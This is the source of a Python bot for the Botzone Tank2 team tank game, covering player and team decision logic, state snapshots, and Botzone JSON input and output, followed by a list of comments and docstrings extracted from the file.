""" return True def make_decision(self): """ 将 player 缓存的结果直接返回 """ team = self._team player1, player2 = team.players action1 = player1.get_current_decision() action2 = player2.get_current_decision() return [ action1, action2 ] #{ END 'decision/team/dummy_ending.py' }# #{ BEGIN 'player.py' }# class Player(DecisionMaker): # 不能处理的情况,返回 Action.INVALID #------------------------------------ # 值得注意的是,由于 Player 仅仅被 team 判断,signal 仅用于玩家与团队间交流,因此团队在判断时, # 不考虑玩家返回的信号,尽管玩家实际返回的值是 (action, signal) # UNHANDLED_RESULT = Action.INVALID def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Player(Player): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的玩家类,使之为 Singleton Input: - tank TankField/BattleTank 第一次必须是 TankField ,之后随意 - map Tank2Map """ key = (tank.side, tank.id) # 只要有这两个属性就可以 obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") if not isinstance(tank, TankField): raise TypeError("tank must be a TankField object at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 使用自定义初始化条件初始化 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map self._battler = BattleTank(tank, map) self._team = None # Tank2Team self._teammate = None # Tank2Player self._opponents = None # [Tank2Player, Tank2Player] self._status = set() # 当前回合的状态,可以有多个,每回合情况 self._labels = set() # 对手给我做的标记,标记后长期有效 self._riskyEnemy = None # 缓存引起潜在风险的敌人 BattleTank self._currentRoute = None # 缓存这回合的攻击路线。这个属性加入较早,只缓存了 marching 逻辑下的路线 self._currentDecision = None # 缓存决策结果,注:每调用一次 make_decision 就会自动修改一次这个结果 self._teamDecision = None # 缓存团队策略 class _SnapshotManager(object): """ 用于管理 player 还原点的创建、选择回滚等行为 --------------------------------------------- 可以为 player 在决策过程中产生的临时变量创建快照,如果在此后又进行了重新决策,但是又不想让这个 决策修改之前决策时留下的临时变量,那么就可以在新的决策前先通过这个类创建一个快照,结束后再通过快照 进行回滚。 关于还原点的创建 ---------------- 1. 对于可能被修改地址指向内存的属性,需要创建一个深拷贝,例如 set, list 类型的属性 2. 对于只是储存引用的属性,那么此处只需要复制引用。这对于采用单例模式设计的类的实例来说是必须的 3. 对于不可变对象,只需进行简单的值复制 """ MUTABLE_ATTRIBUTES = ( "_status", "_labels" ) IMMUTABLE_ATTRIBUTES = ( "_currentDecision", "_teamDecision" ) REFERENCE_ATTRIBUTES = ( "_currentRoute", "_riskyEnemy" ) TEMPORARY_ATTRIBUTES = MUTABLE_ATTRIBUTES + IMMUTABLE_ATTRIBUTES + REFERENCE_ATTRIBUTES def __init__(self): self._snapshot = None self._discarded = False # 是否废弃当前快照,让 player 的状态永久改变 def create_snapshot(self): """ 创建一个快照 由于决策时可能还会更改敌人的状态,所以实际上是给所有人创建快照 """ snapshot = self._snapshot = {} # (side, id) -> attributes for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] = {} for attr, value in player.__dict__.items(): if attr in self.__class__.MUTABLE_ATTRIBUTES: cache[attr] = deepcopy(value) # 创建深拷贝 elif attr in self.__class__.IMMUTABLE_ATTRIBUTES: cache[attr] = value # 复制值 elif attr in self.__class__.REFERENCE_ATTRIBUTES: cache[attr] = value # 复制引用 def restore(self): """ 恢复到还原点的状态 """ if self._discarded: # 保存更改的情况下,不再回滚 return snapshot = self._snapshot for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] for attr in self.__class__.TEMPORARY_ATTRIBUTES: player.__dict__[attr] = cache[attr] def discard_snapshot(self): """ 是否丢弃当前 snapshot,保存变更。 之后如果再调用 restrore,将不会当前 snapshot 还原 player 的状态 """ self._discarded = True def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.side, self.id, self._tank.x, self._tank.y) def __copy__(self): return self def __deepcopy__(self): # singleton ! return self @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def defeated(self): return self._tank.destroyed @property def tank(self): return self._tank @property def battler(self): return self._battler @property def team(self): return self._team @property def teammate(self): # -> Tank2Player return self._teammate @property def opponents(self): # -> [Tank2Player, Tank2Player] return self._opponents @contextmanager def create_snapshot(self): """ 创建一个还原点,然后该 player 进行决策,决策完成后回滚 """ try: manager = self.__class__._SnapshotManager() manager.create_snapshot() yield manager # 可以选择不接 snapshot except Exception as e: raise e finally: manager.restore() def set_team(self, team): self._team = team def set_teammate(self, player): # -> Tank2Player assert isinstance(player, Tank2Player) and player.side == self.side self._teammate = player def set_opponents(self, opponents): # -> [Tank2Player] for player in opponents: assert isinstance(player, Tank2Player) and player.side != self.side self._opponents = opponents def get_risky_enemy(self): """ 引起预期行为被拒的敌人,因为该敌人有可能在我方采用预期行为的下一回合将我方击杀 """ return self._riskyEnemy # -> BattleTank def set_risky_enemy(self, enemy): self._riskyEnemy = BattleTank(enemy) # 确保为 BattleTank 对象 def get_current_decision(self): # 返回最后一次决策的结果,用于队员间交流 return self._currentDecision def set_current_decision(self, action): # 用于团队设置队员的当前决策 self._currentDecision = action def get_team_decision(self): # 获得当前的团队决策 return self._teamDecision def has_team_decision(self): return ( self._teamDecision is not None ) def set_team_decision(self, action): # 用于团队设置队员的团队决策 self._teamDecision = action def get_current_attacking_route(self): return self._currentRoute def set_current_attacking_route(self, route): self._currentRoute = route def get_status(self): return self._status def set_status(self, *status): # 添加一个或多个状态 for _status in status: self._status.add(_status) def remove_status(self, *status): # 删除一个或多个状态 for _status in status: self._status.discard(_status) # remove_if_exists def clear_status(self): # 清除所有状态 self._status.clear() def has_status(self, status): # 是否存在某种状态 return status in self._status def get_labels(self): return self._labels def add_labels(self, *labels): # 添加一个或多个标记 for label in labels: self._labels.add(label) def has_label(self, label): # 是否存在某个标记 return label in self._labels def remove_labels(self, *labels): # 删除一个活多个标记 for label in labels: self._labels.discard(label) def clear_labels(self): # 清楚全部标记 self._labels.clear() def has_status_in_previous_turns(self, status, turns=1): return self._team.has_status_in_previous_turns(self, status, turns=turns) def has_status_recently(self, status, turns): return self._team.has_status_recently(self, status, turns) def get_previous_action(self, back=1): return self._team.get_previous_action(self, back) def get_previous_attacking_route(self): return self._team.get_previous_attcking_route(self) def _is_safe_action(self, action): """ 评估该这个决策是否安全 Return: - issafe bool 安全 """ tank = self._tank map_ = self._map battler = self._battler teammate = map_.tanks[tank.side][1 - tank.id] if not map_.is_valid_action(tank, action): # 先检查是否为有效行为 return False if Action.is_stay(action): return True # 移动情况下有一种可能的风险 #-------------------------- # 1. 需要考虑移动后恰好被对方打中 # 2. 移动后恰好遇到两个敌人,假设当前回合敌人不动 # ------------------------- if Action.is_move(action): oppBattlers = [ _player.battler for _player in self._opponents ] riskFreeOpps = [] for oppBattler in oppBattlers: if not oppBattler.canShoot: # 对手本回合无法射击,则不必担心 riskFreeOpps.append(oppBattler) with map_.simulate_one_action(tank, action): # 提交地图模拟情况 if len( battler.get_enemies_around() ) > 1: # 移动后遇到两个敌人 battler1, battler2 = oppBattlers x1, y1 = battler1.xy x2, y2 = battler2.xy if x1 != x2 and y1 != y2: # 并且两个敌人不在同一直线上 self.set_risky_enemy(battler1) # 随便设置一个? return False for oppBattler in oppBattlers: if oppBattler.destroyed: continue elif oppBattler in riskFreeOpps: continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 移动后可能会被敌人打中 self.set_risky_enemy(oppBattler) return False # 射击情况下有两种可能的危险 #-------------------------- # 1. 打破一堵墙,然后敌人在后面等着 # 注意区分两个敌人的情况! 5ce92ed6d2337e01c7abf544 # 2. 身边没有闪避的机会,打破一堵墙,对方刚好从旁路闪出来 # 3. 打到队友! 5ce90c6dd2337e01c7abce7a #--------------------------- if Action.is_shoot(action): destroyedFields = battler.get_destroyed_fields_if_shoot(action) if not teammate.destroyed and teammate in destroyedFields: return False # 打到队友当然不安全! with map_.simulate_one_action(battler, action): # 模拟本方行为 # # TODO: # 只模拟一个坦克的行为并不能反映真实的世界,因为敌方这回合很有可能射击 # 那么下回合它就无法射击,就不应该造成威胁 # for oppTank in map_.tanks[1 - tank.side]: if oppTank.destroyed: continue oppBattler = BattleTank(oppTank) for oppAction in oppBattler.get_all_valid_move_actions(): # 任意移动行为 with map_.simulate_one_action(oppBattler, oppAction): # 模拟敌方行为 for field in destroyedFields: if field.xy == oppTank.xy: break # 对方下一步不可能移动到我即将摧毁的 field 上,所以这种情况是安全的 else: for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 敌方原地不动或移动一步后,能够看到该坦克 # 还可以尝试回避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 无法回避,危险行为 self.set_risky_enemy(oppBattler) return False return True # 默认安全? def try_make_decision(self, action, instead=Action.STAY): """ 用这个函数提交决策 如果这个决策被判定是危险的,那么将提交 instead 行为 """ if not Action.is_valid(action): return instead elif not self._is_safe_action(action): return instead else: return action def is_safe_to_close_to_this_enemy(self, oppBattler): """ 下回合接近某个敌人是否安全? --------------------------- 用于双方相遇 (且敌人无法射击),我方试图接近他的时候 这种情况下需要判断周围是否有敌人攻击我 """ tank = self._tank map_ = self._map battler = self._battler if oppBattler.canShoot: # 可以射击,必定不安全,还是检查一下 return False action = battler.move_to(oppBattler) if map_.is_valid_move_action(tank, action): for _oppBattler in [ _player.battler for _player in self._opponents ]: # 找到另一个敌人 if _oppBattler.destroyed: # 输了就不算 continue if _oppBattler is oppBattler: # 排除目前这个敌人 continue if not _oppBattler.canShoot: # 本回合不能攻击的不算 continue # 开始模拟,反正就一架坦克 with map_.simulate_one_action(tank, action): for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 我方坦克将出现在它旁边,并且它可以射击 self.set_risky_enemy(_oppBattler) return False # 可能被偷袭 else: # 此处判断不会被偷袭 return True else: return False # 不能移动,当然不安全 ... def is_safe_to_break_overlap_by_move(self, action, oppBattler): """ 在不考虑和自己重叠的敌人的情况下,判断采用移动的方法打破重叠是否安全 此时将敌人视为不会攻击,然后考虑另一个敌人的攻击 """ tank = self._tank map_ = self._map battler = self._battler if not map_.is_valid_move_action(tank, action): # 还是检查一下,不要出错 return False # 如果移动后有两个敌人在旁边,那么不能前进 5cd3e7a786d50d05a0082a5d #------------------------------------------- with map_.simulate_one_action(tank, action): if len(battler.get_enemies_around()) > 1: #self._riskyEnemy = ?? return False _oppBattlers = [ _player.battler for _player in self._opponents ] for _oppBattler in _oppBattlers: if _oppBattler.destroyed: # 跳过已经输了的 continue if not _oppBattler.canShoot: # 另一个对手不能射击 continue if _oppBattler is oppBattler: # 不考虑和自己重叠的这个坦克 continue with map_.simulate_one_action(tank, action): # 提交模拟 for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 不安全,可能有风险 self.set_risky_enemy(_oppBattler) return False else: return True # 否则是安全的 def is_suitable_to_overlap_with_enemy(self, oppBattler): """ 当两者均没有炮弹,然后中间相差一格时,冲上去和敌方坦克重叠是否合适? WARNING: ------------ 1. 该函数仅适用于两者间移动路劲长度为 2 的情况,其他情况不适用 2. 该函数判定为 False 的情况,表示适合堵路,不适合重叠,但是判定为 False 并不表示一定要冲上去重叠,而是要根据当时的具体情况来判断 """ tank = self._tank map_ = self._map battler = self._battler _route = battler.get_route_to_enemy_by_move(oppBattler) assert _route.length == 2 action = oppBattler.move_to(battler) if map_.is_valid_move_action(oppBattler, action): # # 检查自己所处的位置是否是敌人必经之路 # 如果是,那么就堵路 # originRoute = oppBattler.get_shortest_attacking_route() blockingRoute = oppBattler.get_shortest_attacking_route( # 将我方坦克设为 Steel ignore_enemies=False, bypass_enemies=True) if originRoute.is_not_found(): # 不大可能,但是检查一下 return False if blockingRoute.is_not_found(): # 直接就走不通了,当然非常好啦 return False if blockingRoute.length - originRoute.length > 1: # 认为需要多打破一个以上土墙的情况叫做原路 return False return True # @override def make_decision(self, signal=Signal.NONE): """ 预处理: ------------------ - 清除所有旧有状态 - 清除可能的风险敌人 - 统一处理回复格式 注意: ------------------ - 申明为 _make_decision 过程中的缓存变量,必须在下一次决策前预先清除 """ self.clear_status() # 先清除所有的状态 self._riskyEnemy = None # 清楚所有缓存的风险敌人 res = self._make_decision(signal) if isinstance(res, (tuple, list)) and len(res) == 2: returnSignal = res[1] action = res[0] else: if signal != Signal.NONE: # 说明没有回复团队信号 returnSignal = Signal.UNHANDLED else: returnSignal = Signal.INVALID action = res self._currentDecision = action # 缓存决策 return ( action, returnSignal ) def _make_decision(self, signal): player = self battler = player.battler if player.defeated: player.set_status(Status.DIED) return self.__class__.UNHANDLED_RESULT if not battler.canShoot: player.set_status(Status.RELOADING) if battler.is_face_to_enemy_base(): player.set_status(Status.FACING_TO_ENEMY_BASE) if (not player.has_label(Label.DONT_WITHDRAW) and player.has_label(Label.KEEP_ON_WITHDRAWING) and WithdrawalDecision.ALLOW_WITHDRAWAL ): player.remove_status(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) # 先保持着 这个状态 decisions = DecisionChain( LeaveTeammateDecision(player, signal), AttackBaseDecision(player, signal), EncountEnemyDecision(player, signal), OverlappingDecision(player, signal), BaseDefenseDecision(player, signal), BehindBrickDecision(player, signal), FollowEnemyBehindBrickDecision(player, signal), WithdrawalDecision(player, signal), ActiveDefenseDecision(player, signal), MarchingDecision(player, signal), ) res = decisions.make_decision() if decisions.is_handled(res): return res return self.__class__.UNHANDLED_RESULT #{ END 'player.py' }# #{ BEGIN 'team.py' }# class Team(DecisionMaker): UNHANDLED_RESULT = [ Action.STAY, Action.STAY ] # 实际上不可能碰到 team 不能决策的情况,否则找谁决策呀 ... def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Team(Team): def __init__(self, side, player1, player2, map): player1.set_team(self) player2.set_team(self) self._side = side self._map = map self._player1 = player1 self._player2 = player2 self._opponentTeam = None self._memory = {} # 团队记忆 self._previousActions = [] # 历史行为 @property def side(self): return self._side @property def players(self): return [ self._player1, self._player2 ] def load_memory(self, memory): """ botzone 将 data 传入给 team 恢复记忆 """ if memory is None: memory = { "status": [], # [ set(), set() ] 每轮的状态 "labels": [ set(), set() ], # [ set(), set() ] 已有的标记 "previousRoute": [ None, None ] # [ Route, Route ] } self._memory = memory self._player1.add_labels(*memory["labels"][0]) self._player2.add_labels(*memory["labels"][1]) def dump_memory(self): memory = self._memory memory["status"].append([ self._player1.get_status(), self._player2.get_status(), ]) memory["labels"] = [ self._player1.get_labels(), self._player2.get_labels(), ] memory["previousRoute"] = [ self._player1.get_current_attacking_route(), self._player2.get_current_attacking_route(), ] return memory def get_memory(self): return self._memory def set_previous_actions(self, previousActions): """ 由 botzone input 获得的过去动作,可以将其视为一种记忆 """ self._previousActions = previousActions def set_opponent_team(self, team): """ 设置对手团队 Input: - team Tank2Team """ assert isinstance(team, self.__class__) self._opponentTeam = team def has_status_in_previous_turns(self, player, status, turns=1): """ 在曾经的一定回合里,某玩家是否拥有某个状态 Input: - player Player 玩家实例,不一定是本队的 - status int 状态编号 - turns int 向前检查多少回合 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False # TODO: # 还需要判断回合数是否超出一已知回合? for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): # 逆序 try: previousStatus = allStatus[turn][player.id] except IndexError: # 可能 allStatus 为空 return False if previousStatus is None: return False elif status not in previousStatus: return False else: return True def has_status_recently(self, player, status, turns): """ 最近的几回合内是否曾经拥有过某个状态 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): try: previousStatus = allStatus[turn][player.id] if status in previousStatus: return True except IndexError: return False else: return False def get_previous_action(self, player, back=1): """ 获得一个玩家的操纵坦克的历史行为 Input: - player Player 玩家实例,不一定是本队的 - back int ( >= 1) 前第几回合的历史记录,例如 back = 1 表示前一回合 """ assert back >= 1, "back >= 1 is required" return self._previousActions[player.id][-back] def get_previous_attcking_route(self, player): return self._memory[player.id] def _make_decision(self): """ 团队决策 Return: - actions [int, int] 0, 1 号玩家的决策 """ team = self # 假装先让对方以自己的想法决策 #------------------------------- # 分析对方的行为,可以对下一步的行为作出指导 # for oppPlayer in self._opponentTeam.players: oppPlayer.make_decision() decisions = DecisionChain( IndividualTeamDecision(team), VitalTeamDecision(team), LeaveTeammateTeamDecision(team), ForcedAttackTeamDecision(team), BreakBrickTeamDecision(team), BackToHelpTeamDecision(team), CutThroughMidlineTeamDecision(team), CooperativeAttackTeamDecision(team), PreventTeamHurtTeamDecision(team), TeamDecisionDummyEnding(team), ) res = decisions._make_decision() # for func in [ find_all_routes_for_shoot, find_all_routes_for_move ]: # if not hasattr(func, "__wrapped__"): # continue # _wrapper = func.__wrapped__ # if hasattr(_wrapper, "__memory__"): # _memory = _wrapper.__memory__ # debug_print(_memory.keys(), len(_memory)) # debug_print(sys.getsizeof(_memory)) return res # @override def make_decision(self): """ 如果有的玩家无法决策,那么就将其行为设为 Action.STAY 事实上这种情况是不应该出现的,但是为了防止出错,此处对决策结果进行检查 """ player1 = self._player1 player2 = self._player2 action1, action2 = self._make_decision() if not player1.is_handled(action1): action1 = Action.STAY if not player2.is_handled(action2): action2 = Action.STAY return [ action1, action2 ] #{ END 'team.py' }# #{ BEGIN 'stream.py' }# class BotzoneIstream(object): def read(self): return input() class BotzoneOstream(object): def write(self, data): print(data) #{ END 'stream.py' }# #{ BEGIN 'botzone.py' }# class Botzone(object): def __init__(self, long_running): self._longRunning = long_running self._data = None self._globalData = None self._requests = [] # 对方的决策 self._responses = [] # 己方的决策 @property def data(self): return self._data @property def globalData(self): return self._globalData @property def requests(self): return self._requests @property def responses(self): return self._responses def handle_input(self, stream): """ 解析输入信息 Input: - stream TextIOWrapper 输入流对象,必须实现 read 方法 """ inputJSON = json.loads(stream.read()) self._requests = inputJSON["requests"] self._responses = inputJSON["responses"] self._data = inputJSON.get("data", None) self._globalData = inputJSON.get("globaldata", None) def make_output(self, stream, response, debug, data, globaldata): """ 输出结果 Input: - stream TextIOWrapper 输出流对象,必须实现 write 方法 - response dict Bot 此回合的输出信息 - debug dict/str 调试信息,将被写入log,最大长度为1KB - data dict Bot 此回合的保存信息,将在下回合输入 - globaldata dict Bot 的全局保存信息,将会在下回合输入, 对局结束后也会保留,下次对局可以继续利用 """ stream.write(json.dumps({ "response": response, "debug": debug, "data": data, "globaldata": globaldata, })) if not self._longRunning: sys.exit(0) class Tank2Botzone(Botzone, metaclass=SingletonMeta): def __init__(self, map, long_running=False): super().__init__(long_running) self._mySide = -1 self._map = map self._pastActions = { # 由 requests, responses 解析而来的历史动作记录 (side, id_): [] for side in range(SIDE_COUNT) for id_ in range(TANKS_PER_SIDE) } @property def turn(self): return self._map.turn @property def mySide(self): return self._mySide def _parse_field_points(self, binary): """ 解析 requests 中存在有某种类型 field 的坐标 Input: - binary list 某种类型 field 的 binary 标记 Yield: - (x, y) tuple(int, int) 这个坐标上存在该类型 field """ _MAP_WIDTH = self._map.width for i in range(3): mask = 1 for y in range(i * 3, i * 3 + 3): for x in range(_MAP_WIDTH): if binary[i] & mask: yield (x, y) mask <<= 1 def handle_input(self, stream=sys.stdin): super().handle_input(stream) if self._data is not None: self._data = DataSerializer.deserialize(self._data) if self._globalData is not None: try: self._globalData = DataSerializer.deserialize(self._globalData) except Exception as e: self._globalData = None assert len(self._requests) - len(self._responses) == 1 # 带 header header = self._requests.pop(0) # 此时 header 被去掉 self._mySide = header["mySide"] assert self._mySide in (0, 1), "unexpected mySide %s" % self._mySide for key, _Field in [("brickfield", BrickField), ("steelfield", SteelField), ("waterfield", WaterField),]: for x, y in self._parse_field_points(header[key]): self._map.insert_field(_Field(x, y)) if self._mySide == 0: allBlueActions = self._responses allRedActions = self._requests elif self._mySide == 1: allBlueActions = self._requests allRedActions = self._responses for blueActions, redActions in zip(allBlueActions, allRedActions): self._map.perform(blueActions, redActions) if not len(allBlueActions) == 0 and not len(allRedActions) == 0: b0, b1 = zip(*allBlueActions) r0, r1 = zip(*allRedActions) self._pastActions = { # { (side, id): [Action] } (0, 0): b0, (0, 1): b1, (1, 0): r0, (1, 1): r1, } def make_output(self, actions, stream=sys.stdout, debug=None, data=None, globaldata=None): if data is not None: data = DataSerializer.serialize(data) if globaldata is not None: globaldata = DataSerializer.serialize(globaldata) super().make_output(stream, actions, debug, data, globaldata) def get_past_actions(self, side, id): """ 获得某一坦克的历史决策 """ return self._pastActions.get( (side, id), [] ) # 没有记录则抛出 [] #{ END 'botzone.py' }# #{ BEGIN 'main.py' }# def main(istream=None, ostream=None): map_ = Tank2Map(MAP_WIDTH, MAP_HEIGHT) # Singleton terminal = Tank2Botzone(map_, long_running=LONG_RUNNING_MODE) # Singleton istream = istream or BotzoneIstream() ostream = ostream or BotzoneOstream() while True: t1 = time.time() if LONG_RUNNING_MODE: # 这个模式下 map 对象会复用,首先需要重置 map_.reset() terminal.handle_input(stream=istream) if SIMULATOR_ENV: map_.debug_print_out() if terminal.data is not None: memory = terminal.data["memory"] else: memory = { BLUE_SIDE: None, RED_SIDE: None, } side = terminal.mySide tanks = map_.tanks bluePlayer0 = Tank2Player(tanks[BLUE_SIDE][0], map_) bluePlayer1 = Tank2Player(tanks[BLUE_SIDE][1], map_) redPlayer0 = Tank2Player(tanks[RED_SIDE][0], map_) redPlayer1 = Tank2Player(tanks[RED_SIDE][1], map_) bluePlayers = [bluePlayer0, bluePlayer1] redPlayers = [redPlayer0, redPlayer1] bluePlayer0.set_teammate(bluePlayer1) bluePlayer1.set_teammate(bluePlayer0) redPlayer0.set_teammate(redPlayer1) redPlayer1.set_teammate(redPlayer0) bluePlayer0.set_opponents(redPlayers) bluePlayer1.set_opponents(redPlayers) redPlayer0.set_opponents(bluePlayers) redPlayer1.set_opponents(bluePlayers) blueTeam = Tank2Team(BLUE_SIDE, bluePlayer0, bluePlayer1, map_) redTeam = Tank2Team(RED_SIDE, redPlayer0, redPlayer1, map_) blueTeam.set_opponent_team(redTeam) redTeam.set_opponent_team(blueTeam) blueTeam.load_memory(memory[BLUE_SIDE]) redTeam.load_memory(memory[RED_SIDE]) blueTeam.set_previous_actions([ terminal.get_past_actions(BLUE_SIDE, bluePlayer0.id), terminal.get_past_actions(BLUE_SIDE, bluePlayer1.id), ]) redTeam.set_previous_actions([ terminal.get_past_actions(RED_SIDE, redPlayer0.id), terminal.get_past_actions(RED_SIDE, redPlayer1.id), ]) if side == BLUE_SIDE: myPlayer0 = bluePlayer0 myPlayer1 = bluePlayer1 myPlayers = bluePlayers myTeam = blueTeam oppPlayers = redPlayers oppTeam = redTeam elif side == RED_SIDE: myPlayer0 = redPlayer0 myPlayer1 = redPlayer1 myPlayers = redPlayers myTeam = redTeam oppPlayers = bluePlayers oppTeam = blueTeam else: raise Exception("unexpected side %s" % side) actions = myTeam.make_decision() if SIMULATOR_ENV: allStatus = [ player.get_status().copy() for player in myPlayers ] allLabels = [ player.get_labels().copy() for player in myPlayers ] if SIMULATOR_ENV: oppActions = oppTeam.make_decision() oppAllStatus = [ player.get_status().copy() for player in oppPlayers ] oppAllLabels = [ player.get_labels().copy() for player in oppPlayers ] if SIMULATOR_ENV: _CUT_OFF_RULE = "-" * 20 _SIDE_NAMES = ["Blue", "Red"] simulator_print("Decisions for next turn:") simulator_print(_CUT_OFF_RULE) def _print_decision(actions, side, allStatus, allLabels): for id_, action in enumerate(actions): _output = "%-4s %02d: %-11s [status] %s" % ( _SIDE_NAMES[side], id_+1, Action.get_name(action), ", ".join( Status.get_name(status) for status in allStatus[id_] ), ) if allLabels[id_]: _output += " [label] %s" % ( ", ".join( Label.get_name(label) for label in allLabels[id_] ) ) simulator_print(_output) _print_decision(actions, side, allStatus, allLabels) _print_decision(oppActions, 1-side, oppAllStatus, oppAllLabels) simulator_print(_CUT_OFF_RULE) simulator_print("Actually actions on this turn:") simulator_print(_CUT_OFF_RULE) for side, tanks in enumerate(map_.tanks): for id_, tank in enumerate(tanks): simulator_print("%s %02d: %s" % (_SIDE_NAMES[side], id_+1, Action.get_name(tank.previousAction))) simulator_print(_CUT_OFF_RULE) t2 = time.time() data = { "memory": [ blueTeam.dump_memory(), redTeam.dump_memory() ], } debugInfo = { "time": round(t2-t1, 4), "storage": sys.getsizeof(DataSerializer.serialize(data)) } terminal.make_output(actions, stream=ostream, debug=debugInfo, data=data) if __name__ == '__main__': main() #{ END 'main.py' }#
zh
0.898004
# -*- coding: utf-8 -*- # @author: Rabbit # @filename: botzone_tank2.py # @date: 2019-05-29 21:31:38 # @site: https://github.com/zhongxinghong/Botzone-Tank2 # @description: Automatically built Python single-file script for Botzone/Tank2 game MIT License Copyright (c) 2019 Rabbit Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #{ BEGIN 'const.py' }# #----------------------# # Environment Variable # #----------------------# #-------------# # Game Config # #-------------# #-------------# # Game Status # #-------------# #{ END 'const.py' }# #{ BEGIN 'global_.py' }# #{ END 'global_.py' }# #{ BEGIN 'utils.py' }# 用于直接打断外层循环,或者继续外层循环 如果置于循环体之外,就是 break outer 如果置于循环体之内,就是 continue outer # 每次创建后都不相同,嵌套的情况下,需要确保名称不相同 # 这样做是为了防止嵌套的情况下,无法从内层直接跳到最外层 from werkzeug._internal from werkzeug.utils 清除缓存 根据参数列表缓存函数的返回值的修饰器 ------------------------------------ 1. func 会以 __memory__ 缓存返回结果 2. func 会带上 make_key 方法,可以用来获取传入参数列表对应的缓存 key 3. func 会带上 clear_memory 方法,可以清空所有的缓存结果 4. 如果返回值是生成器,会立即获得完整结果并转为 tuple 类型 这个函数主要用于缓存搜索路径 # kwargs 自动排序 # 如果返回结果是生成器,那么马上获得所有结果 Singleton Metaclass @link https://github.com/jhao104/proxy_pool/blob/428359c8dada998481f038dbdc8d3923e5850c0e/Util/utilClass.py 使得枚举类内所有的 int 值都增加一个 __offset__ 偏移量 使得不同的枚举类可以用同样的 int 值申明 case,但是不同枚举类间,实际的属性值不同不同 需要在类属性中通过 __offset__ 值申明偏移量 # 默认为 0 #{ END 'utils.py' }# #{ BEGIN 'action.py' }# # 空与无效 # 额外添加的 # 停止 # 移动 # 射击 # 根据 action 的值判断移动方向和射击方向 # 方便用于迭代 # 是否为有效行为 # 是否为停止行为 # 是否为移动行为 # 是否为射击行为 两个行动方向是否相对 两个行动方向是否相同 获得 (x1, y1) -> (x2, y2) 的 move 行为值 可以不相邻! # STAY 获得 (x1, y1) -> (x2, y2) 的射击行为 这个就是对 get_action 的命名,这出于历史遗留问题 ... 获得 (x1, y1) -> (x2, y2) 的射击行为 #{ END 'action.py' }# #{ BEGIN 'field.py' }# #-----------------------# # rule: BASE + 1 + side # #-----------------------# # side = -1 # side = 0 # side = 1 #-----------------------# # rule: TANK + 1 + side # #-----------------------# # side = -1 # side = 0 # side = 1 # const #{ END 'field.py' }# #{ BEGIN 'map_.py' }# 判断 (x, y) 坐标是否位于地图内 获得 xy: (x, y) 的内容 一个用于回滚计数的内部类 # Stack([Record]) 记录被摧毁的 fields 用于回滚 # struct Record: ( # turn: int, # xy: (int, int), # field: Field, # ) # Stack([ [[int, int], [int, int]] ]) 所有坦克的历史动作记录,用于回滚 # turn -> [[int, int], [int, int]] 记录 perform 所执行过的动作,用于 undo_revert # ----------------------- #self._revertStack = [] # [debug] 保存需要 revert 的行为 #self._revertIdx = 0 # [debug] 当前 revert 的编号 # 重置整个地图 # 清除缓存属性 #CachedProperty.clean(self, "matrix") #CachedProperty.clean(self, "matrix_T") # 不再使用缓存啦 # 当前回合数 #@CachedProperty # 缓存效果不明显 缓存 to_type_matrix 的值 WARNING: - 因为 list 是可变对象,因此不要对返回值进行修改,以免缓存的属性值改变 - 如需修改,需要首先调用 np.copy(matrix) 获得一个副本,然后对副本进行修改 #@CachedProperty # 缓存效果不明显 初始化基地和基地前的钢墙 # x-center # side 1 蓝方 # side 2 红方 初始化坦克 # side 1 蓝方 左 0 右 1 # side 2 红方 左 1 右 0 # 记录被清楚的对象 转化成以 field.type 值表示的地图矩阵 Return: - matrix np.array( [[int]] ) 二维的 type 值矩阵 WARNING: - 矩阵的索引方法为 (y, x) ,实际使用时通常需要转置一下,使用 matrix.T # 重合视为一个坦克 # 遵循 Field 中常数定义的算法 判断某坐标点是否有多辆坦克堆叠 判断是否为合法的移动行为 #assert Action.is_move(action), "action %s is not a move-action" % action # 因为模拟地图导致了一些不可测的结果,这个地方不能 assert # 只要打一个补丁,开发的时候自己注意一下就好,记得 action % 4 # 遇到坦克不能移动! 判断是否为合法的设计行为 # assert Action.is_shoot(action), "action %s is not a shoot-action" % action # 只要不连续两回合射击都合理 判断是否为合法行为 # 未知的行为 执行一回合的行为 Input: - blue_actions [int, int] 蓝方 0, 1 号坦克将执行的动作 - red_actions [int, 